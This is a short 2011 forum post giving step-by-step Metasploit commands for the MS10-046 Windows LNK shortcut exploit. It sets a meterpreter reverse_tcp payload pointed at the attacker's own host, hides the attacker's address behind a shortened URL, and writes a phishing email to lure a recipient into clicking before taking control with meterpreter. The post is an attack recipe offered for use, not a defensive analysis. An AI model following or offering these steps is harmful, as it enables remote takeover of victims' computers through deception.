Nytro Posted May 23, 2011 Report Posted May 23, 2011 A practical attack - LNK exploitNotes1. sudo ./msfconsole2. use windows/browser/ms10_046_shortcut_icon_dllloader excellent Microsoft Windows Shell LNK Code Execution3. set SRVHOST 192.168.175.1294. set Payload windows/meterpreter/reverse_tcp5. set LHOST 192.168.175.1296. exploit7. go to shorturl.com and create a short url for your machines ip8. Write an email enticing the recipient to click the link.9. use metaterpreter.10. pwnage. Video:http://vimeo.com/16699569 Quote